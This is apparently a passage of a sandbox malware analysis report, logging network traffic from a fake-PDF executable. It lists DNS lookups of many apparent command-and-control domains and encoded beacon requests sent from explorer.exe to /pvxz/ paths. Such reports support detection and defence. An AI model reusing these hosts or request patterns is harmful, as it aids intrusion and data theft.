Dec 1, 2021 16:26:21.440028906 CET	49842	80	192.168.2.3	66.235.200.145
Dec 1, 2021 16:26:21.457025051 CET	80	49842	66.235.200.145	192.168.2.3
Dec 1, 2021 16:26:21.942413092 CET	49842	80	192.168.2.3	66.235.200.145
Dec 1, 2021 16:26:21.959749937 CET	80	49842	66.235.200.145	192.168.2.3
Dec 1, 2021 16:26:21.961246014 CET	49842	80	192.168.2.3	66.235.200.145
Dec 1, 2021 16:26:27.207068920 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:27.397614002 CET	80	49843	156.235.157.134	192.168.2.3
Dec 1, 2021 16:26:27.397727013 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:27.398004055 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:27.590044975 CET	80	49843	156.235.157.134	192.168.2.3
Dec 1, 2021 16:26:27.590081930 CET	80	49843	156.235.157.134	192.168.2.3
Dec 1, 2021 16:26:27.590220928 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:27.590282917 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:27.781677961 CET	80	49843	156.235.157.134	192.168.2.3
Dec 1, 2021 16:26:27.781714916 CET	80	49843	156.235.157.134	192.168.2.3
Dec 1, 2021 16:26:27.781775951 CET	49843	80	192.168.2.3	156.235.157.134
Dec 1, 2021 16:26:32.788705111 CET	49845	80	192.168.2.3	197.248.5.16
Dec 1, 2021 16:26:32.977160931 CET	80	49845	197.248.5.16	192.168.2.3
Dec 1, 2021 16:26:32.977281094 CET	49845	80	192.168.2.3	197.248.5.16
Dec 1, 2021 16:26:32.977440119 CET	49845	80	192.168.2.3	197.248.5.16
Dec 1, 2021 16:26:33.166270018 CET	80	49845	197.248.5.16	192.168.2.3
Dec 1, 2021 16:26:33.168168068 CET	80	49845	197.248.5.16	192.168.2.3
Dec 1, 2021 16:26:33.168184996 CET	80	49845	197.248.5.16	192.168.2.3
Dec 1, 2021 16:26:33.168327093 CET	49845	80	192.168.2.3	197.248.5.16
Dec 1, 2021 16:26:33.168395042 CET	49845	80	192.168.2.3	197.248.5.16
Dec 1, 2021 16:26:33.356256962 CET	80	49845	197.248.5.16	192.168.2.3
Dec 1, 2021 16:26:50.547013998 CET	49846	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:26:50.583431959 CET	80	49846	2.57.90.16	192.168.2.3
Dec 1, 2021 16:26:50.583549023 CET	49846	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:26:50.583769083 CET	49846	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:26:50.619939089 CET	80	49846	2.57.90.16	192.168.2.3
Dec 1, 2021 16:26:50.619972944 CET	80	49846	2.57.90.16	192.168.2.3
Dec 1, 2021 16:26:50.619985104 CET	80	49846	2.57.90.16	192.168.2.3
Dec 1, 2021 16:26:50.620179892 CET	49846	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:26:50.620244026 CET	49846	80	192.168.2.3	2.57.90.16
Dec 1, 2021 16:26:50.657891035 CET	80	49846	2.57.90.16	192.168.2.3
Dec 1, 2021 16:26:55.669704914 CET	49847	80	192.168.2.3	15.197.142.173
Dec 1, 2021 16:26:55.689095974 CET	80	49847	15.197.142.173	192.168.2.3
Dec 1, 2021 16:26:55.689177036 CET	49847	80	192.168.2.3	15.197.142.173
Dec 1, 2021 16:26:55.689368963 CET	49847	80	192.168.2.3	15.197.142.173
Dec 1, 2021 16:26:55.708215952 CET	80	49847	15.197.142.173	192.168.2.3
Dec 1, 2021 16:26:55.888065100 CET	80	49847	15.197.142.173	192.168.2.3
Dec 1, 2021 16:26:55.888092995 CET	80	49847	15.197.142.173	192.168.2.3
Dec 1, 2021 16:26:55.888245106 CET	49847	80	192.168.2.3	15.197.142.173
Dec 1, 2021 16:26:55.888314009 CET	49847	80	192.168.2.3	15.197.142.173
Dec 1, 2021 16:26:55.907185078 CET	80	49847	15.197.142.173	192.168.2.3
Dec 1, 2021 16:27:06.903580904 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.094424009 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.094533920 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.094609022 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.285371065 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.285655975 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.285675049 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.285686970 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.285830021 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.285924911 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.286078930 CET	80	49848	156.67.222.132	192.168.2.3
Dec 1, 2021 16:27:07.286242008 CET	49848	80	192.168.2.3	156.67.222.132
Dec 1, 2021 16:27:07.476579905 CET	80	49848	156.67.222.132	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 1, 2021 16:22:55.711278915 CET	60784	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:22:55.734697104 CET	53	60784	8.8.8.8	192.168.2.3
Dec 1, 2021 16:23:14.527049065 CET	59026	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:23:14.549345016 CET	53	59026	8.8.8.8	192.168.2.3
Dec 1, 2021 16:23:21.623976946 CET	60823	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:23:21.645243883 CET	53	60823	8.8.8.8	192.168.2.3
Dec 1, 2021 16:24:49.347831964 CET	51539	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:24:49.379744053 CET	53	51539	8.8.8.8	192.168.2.3
Dec 1, 2021 16:24:54.724817038 CET	55393	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:24:54.764270067 CET	53	55393	8.8.8.8	192.168.2.3
Dec 1, 2021 16:24:59.865257978 CET	50585	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:00.033149004 CET	53	50585	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:05.466753006 CET	63456	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:05.820394039 CET	53	63456	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:11.961791039 CET	58540	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:11.995014906 CET	53	58540	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:17.395590067 CET	55108	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:17.417917013 CET	53	55108	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:22.444192886 CET	64432	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:22.566920042 CET	53	64432	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:27.813575029 CET	49250	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:27.921237946 CET	53	49250	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:52.326011896 CET	63490	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:52.431931019 CET	53	63490	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:54.015870094 CET	65110	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:54.044570923 CET	53	65110	8.8.8.8	192.168.2.3
Dec 1, 2021 16:25:59.399616003 CET	61120	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:25:59.728401899 CET	53	61120	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:05.538170099 CET	53079	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:05.563815117 CET	53	53079	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:15.985184908 CET	50824	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:16.015722036 CET	53	50824	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:21.118036032 CET	56706	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:21.411696911 CET	53	56706	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:26.962815046 CET	53569	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:27.205657959 CET	53	53569	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:32.631376982 CET	51046	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:32.787507057 CET	53	51046	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:50.516674042 CET	65501	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:50.545361996 CET	53	65501	8.8.8.8	192.168.2.3
Dec 1, 2021 16:26:55.637681007 CET	53465	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:26:55.668019056 CET	53	53465	8.8.8.8	192.168.2.3
Dec 1, 2021 16:27:01.840682030 CET	49290	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:27:01.863287926 CET	53	49290	8.8.8.8	192.168.2.3
Dec 1, 2021 16:27:06.869294882 CET	59754	53	192.168.2.3	8.8.8.8
Dec 1, 2021 16:27:06.901766062 CET	53	59754	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 1, 2021 16:22:55.711278915 CET	192.168.2.3	8.8.8.8	0xddba	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.527049065 CET	192.168.2.3	8.8.8.8	0x419b	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.623976946 CET	192.168.2.3	8.8.8.8	0x3a6	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.347831964 CET	192.168.2.3	8.8.8.8	0x62cb	Standard query (0)	www.ncgf08.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:54.724817038 CET	192.168.2.3	8.8.8.8	0x4c81	Standard query (0)	www.sa-pontianak.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:59.865257978 CET	192.168.2.3	8.8.8.8	0x1eb8	Standard query (0)	www.hbjngs.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:05.466753006 CET	192.168.2.3	8.8.8.8	0x7c00	Standard query (0)	www.sumikkoremon.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:11.961791039 CET	192.168.2.3	8.8.8.8	0xb582	Standard query (0)	www.tourbox.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:17.395590067 CET	192.168.2.3	8.8.8.8	0x3fa6	Standard query (0)	www.9etmorea.info	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:22.444192886 CET	192.168.2.3	8.8.8.8	0x27c	Standard query (0)	www.jardingenesis.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:27.813575029 CET	192.168.2.3	8.8.8.8	0x68f1	Standard query (0)	www.era636.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:52.326011896 CET	192.168.2.3	8.8.8.8	0x4b91	Standard query (0)	www.era636.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.015870094 CET	192.168.2.3	8.8.8.8	0x6cd4	Standard query (0)	www.enterprisedaas.computer	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:59.399616003 CET	192.168.2.3	8.8.8.8	0x4d10	Standard query (0)	www.hwkm.net	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.538170099 CET	192.168.2.3	8.8.8.8	0x1a6f	Standard query (0)	www.piiqrio.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:15.985184908 CET	192.168.2.3	8.8.8.8	0x7474	Standard query (0)	www.neema.xyz	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:21.118036032 CET	192.168.2.3	8.8.8.8	0x860	Standard query (0)	www.cis136-tgarza.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:26.962815046 CET	192.168.2.3	8.8.8.8	0x53ef	Standard query (0)	www.meishangtianhua.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:32.631376982 CET	192.168.2.3	8.8.8.8	0xcb16	Standard query (0)	www.finetipster.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:50.516674042 CET	192.168.2.3	8.8.8.8	0x8c31	Standard query (0)	www.sa-pontianak.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:55.637681007 CET	192.168.2.3	8.8.8.8	0xcd24	Standard query (0)	www.localproperty.team	A (IP address)	IN (0x0001)
Dec 1, 2021 16:27:01.840682030 CET	192.168.2.3	8.8.8.8	0xfda2	Standard query (0)	www.jsboyat.com	A (IP address)	IN (0x0001)
Dec 1, 2021 16:27:06.869294882 CET	192.168.2.3	8.8.8.8	0xa9cd	Standard query (0)	www.tourbox.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Dec 1, 2021 16:22:55.734697104 CET	8.8.8.8	192.168.2.3	0xddba	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:22:55.734697104 CET	8.8.8.8	192.168.2.3	0xddba	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:22:55.734697104 CET	8.8.8.8	192.168.2.3	0xddba	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:22:55.734697104 CET	8.8.8.8	192.168.2.3	0xddba	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:22:55.734697104 CET	8.8.8.8	192.168.2.3	0xddba	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.549345016 CET	8.8.8.8	192.168.2.3	0x419b	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.549345016 CET	8.8.8.8	192.168.2.3	0x419b	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.549345016 CET	8.8.8.8	192.168.2.3	0x419b	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.549345016 CET	8.8.8.8	192.168.2.3	0x419b	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:14.549345016 CET	8.8.8.8	192.168.2.3	0x419b	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.645243883 CET	8.8.8.8	192.168.2.3	0x3a6	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.645243883 CET	8.8.8.8	192.168.2.3	0x3a6	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.645243883 CET	8.8.8.8	192.168.2.3	0x3a6	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.645243883 CET	8.8.8.8	192.168.2.3	0x3a6	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:23:21.645243883 CET	8.8.8.8	192.168.2.3	0x3a6	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	www.ncgf08.xyz	www.nc1cname.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	www.nc1cname.com	nc1cname.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.224.31.114	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.225.32.82	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.225.30.70	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.224.31.115	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		104.233.180.147	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.225.30.66	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:49.379744053 CET	8.8.8.8	192.168.2.3	0x62cb	No error (0)	nc1cname.com		23.225.32.86	A (IP address)	IN (0x0001)
Dec 1, 2021 16:24:54.764270067 CET	8.8.8.8	192.168.2.3	0x4c81	No error (0)	www.sa-pontianak.com	sa-pontianak.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:24:54.764270067 CET	8.8.8.8	192.168.2.3	0x4c81	No error (0)	sa-pontianak.com		2.57.90.16	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:00.033149004 CET	8.8.8.8	192.168.2.3	0x1eb8	No error (0)	www.hbjngs.com		154.81.158.75	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:05.820394039 CET	8.8.8.8	192.168.2.3	0x7c00	No error (0)	www.sumikkoremon.com	sumikkoremon.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:25:05.820394039 CET	8.8.8.8	192.168.2.3	0x7c00	No error (0)	sumikkoremon.com		163.44.239.73	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:11.995014906 CET	8.8.8.8	192.168.2.3	0xb582	No error (0)	www.tourbox.xyz	tourbox.xyz		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:25:11.995014906 CET	8.8.8.8	192.168.2.3	0xb582	No error (0)	tourbox.xyz		156.67.222.132	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:17.417917013 CET	8.8.8.8	192.168.2.3	0x3fa6	Name error (3)	www.9etmorea.info	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:22.566920042 CET	8.8.8.8	192.168.2.3	0x27c	No error (0)	www.jardingenesis.com	jardingenesis.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:25:22.566920042 CET	8.8.8.8	192.168.2.3	0x27c	No error (0)	jardingenesis.com		68.70.164.19	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:27.921237946 CET	8.8.8.8	192.168.2.3	0x68f1	No error (0)	www.era636.com		165.32.109.217	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:52.431931019 CET	8.8.8.8	192.168.2.3	0x4b91	No error (0)	www.era636.com		165.32.109.217	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	www.enterprisedaas.computer	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:54.044570923 CET	8.8.8.8	192.168.2.3	0x6cd4	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Dec 1, 2021 16:25:59.728401899 CET	8.8.8.8	192.168.2.3	0x4d10	No error (0)	www.hwkm.net		64.69.40.19	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	www.piiqrio.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:05.563815117 CET	8.8.8.8	192.168.2.3	0x1a6f	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:16.015722036 CET	8.8.8.8	192.168.2.3	0x7474	No error (0)	www.neema.xyz		86.105.245.69	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:21.411696911 CET	8.8.8.8	192.168.2.3	0x860	No error (0)	www.cis136-tgarza.com	cis136-tgarza.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:26:21.411696911 CET	8.8.8.8	192.168.2.3	0x860	No error (0)	cis136-tgarza.com		66.235.200.145	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:27.205657959 CET	8.8.8.8	192.168.2.3	0x53ef	No error (0)	www.meishangtianhua.com		156.235.157.134	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:32.787507057 CET	8.8.8.8	192.168.2.3	0xcb16	No error (0)	www.finetipster.com	finetipster.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:26:32.787507057 CET	8.8.8.8	192.168.2.3	0xcb16	No error (0)	finetipster.com		197.248.5.16	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:50.545361996 CET	8.8.8.8	192.168.2.3	0x8c31	No error (0)	www.sa-pontianak.com	sa-pontianak.com		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:26:50.545361996 CET	8.8.8.8	192.168.2.3	0x8c31	No error (0)	sa-pontianak.com		2.57.90.16	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:55.668019056 CET	8.8.8.8	192.168.2.3	0xcd24	No error (0)	www.localproperty.team	localproperty.team		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:26:55.668019056 CET	8.8.8.8	192.168.2.3	0xcd24	No error (0)	localproperty.team		15.197.142.173	A (IP address)	IN (0x0001)
Dec 1, 2021 16:26:55.668019056 CET	8.8.8.8	192.168.2.3	0xcd24	No error (0)	localproperty.team		3.33.152.147	A (IP address)	IN (0x0001)
Dec 1, 2021 16:27:01.863287926 CET	8.8.8.8	192.168.2.3	0xfda2	Name error (3)	www.jsboyat.com	none	none	A (IP address)	IN (0x0001)
Dec 1, 2021 16:27:06.901766062 CET	8.8.8.8	192.168.2.3	0xa9cd	No error (0)	www.tourbox.xyz	tourbox.xyz		CNAME (Canonical name)	IN (0x0001)
Dec 1, 2021 16:27:06.901766062 CET	8.8.8.8	192.168.2.3	0xa9cd	No error (0)	tourbox.xyz		156.67.222.132	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

• cdn.discordapp.com

• www.ncgf08.xyz

• www.sa-pontianak.com

• www.hbjngs.com

• www.sumikkoremon.com

• www.tourbox.xyz

• www.jardingenesis.com

• www.enterprisedaas.computer

• www.hwkm.net

• www.piiqrio.com

• www.neema.xyz

• www.cis136-tgarza.com

• www.meishangtianhua.com

• www.finetipster.com

• www.localproperty.team

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49750	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49751	162.159.129.233	443	C:\Users\user\Desktop\DOC209272621615.PDF.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49838	198.54.117.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:25:54.218569040 CET	8656	OUT	GET /pvxz/?_FN4W=CV_PbjYpbVj&e0DDHLix=VkzKqNHEMf7DVNqsETKs6wpXpLehvGO8WXwP2kNWjaoREXW57VMlBwZntpJdd+mq+oTm HTTP/1.1 Host: www.enterprisedaas.computer Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49839	64.69.40.19	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 16:26:00.029511929 CET	8656	OUT	GET /pvxz/?e0DDHLix=3PJirK5cgl2FciVCq4PQLPbrqQd5ReNTXZ5Wt3Cj+i9zWbfEV8YElnpOrs676e/lB9CQ&_FN4W=CV_PbjYpbVj HTTP/1.1 Host: www.hwkm.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 1, 2021 16:26:00.505376101 CET	8658	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 01 Dec 2021 15:26:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 66 66 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e e3 80 8a e4 b9 85 e4 b9 85 e5 9b bd e4 ba a7 e7 b2 be e5 93 81 e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e6 89 8b e6 9c ba e7 89 88 e6 97 a5 e6 9c ac e7 86 9f e5 a6 87 e7 89 b2 e4 ba a4 e8 a7 86 e9 a2 91 e5 85 8d e8 b4 b9 e7 89 88 e4 b8 8b e8 bd bd e3 80 8b 42 44 e9 ab 98 e6 b8 85 e6 97 a0 e7 a0 81 e5 ae 8c e6 95 b4 e7 89 88 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 2d e9 ab 98 e6 b8 85 41 56 e5 bd b1 e8 a7 86 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e9 ab 98 e6 b8 85 61 76 e5 bd b1 e8 a7 86 2c e4 b9 85 e4 b9 85 e5 9b bd e4 ba a7 e7 b2 be e5 93 81 e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e6 89 8b e6 9c ba e7 89 88 2c e4 b8 ad e6 96 87 e5 ad 97 e5 b9 95 e4 ba 9a e6 b4 b2 e6 97 a0 e7 ba bf e7 a0 81 e4 b8 80 e5 8c ba 2c e5 9b bd e4 ba a7 e6 ac a7 e7 be 8e e5 9b bd e6 97 a5 e4 ba a7 2c e5 9b bd e4 ba a7 20 e6 97 a5 e9 9f a9 20 e6 ac a7 e7 be 8e 20 e9 ab 98 e6 b8 85 20 e4 ba 9a e6 b4 b2 2c e5 8f af e4 bb a5 e7 9b b4 e6 8e a5 e8 a7 82 e7 9c 8b e7 9a 84 61 76 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 23 2c e5 a4 a9 e5 a4 a9 e9 80 8f e7 8b a0 e7 8b a0 e7 88 b1 e7 bb bc e5 90 88 e4 b8 80 e6 9c ac e9 81 93 2c e5 9b bd e4 ba a7 e6 88 90 e4 ba ba e7 b2 be e5 93 81 e8 87 aa e6 8b 8d e8 a7 86 e9 a2 91 2c e7 ac ac e4 ba 94 e8 89 b2 e4 bf ba e4 b9 83 e5 8e bb e4 b9 9f 2c e4 ba ba e5 a6 bb e5 b0 91 e5 a6 87 e5 b1 81 e8 82 a1 e7 bf 98 e6 b0 b4 e5 a4 9a e9 ab 98 e6 b8 85 e5 9c a8 e7 ba bf e8 a7 82 e7 9c 8b 2c e9 aa 9a e6 b0 94 e5 a6 b9 e5 ad 90 e5 8b be e5 bc 95 e7 90 86 e5 8f 91 e5 ba 97 2c e5 b0 8f e5 a7 90 e8 bd ac e8 a1 8c e5 bd 93 e8 89 b2 e6 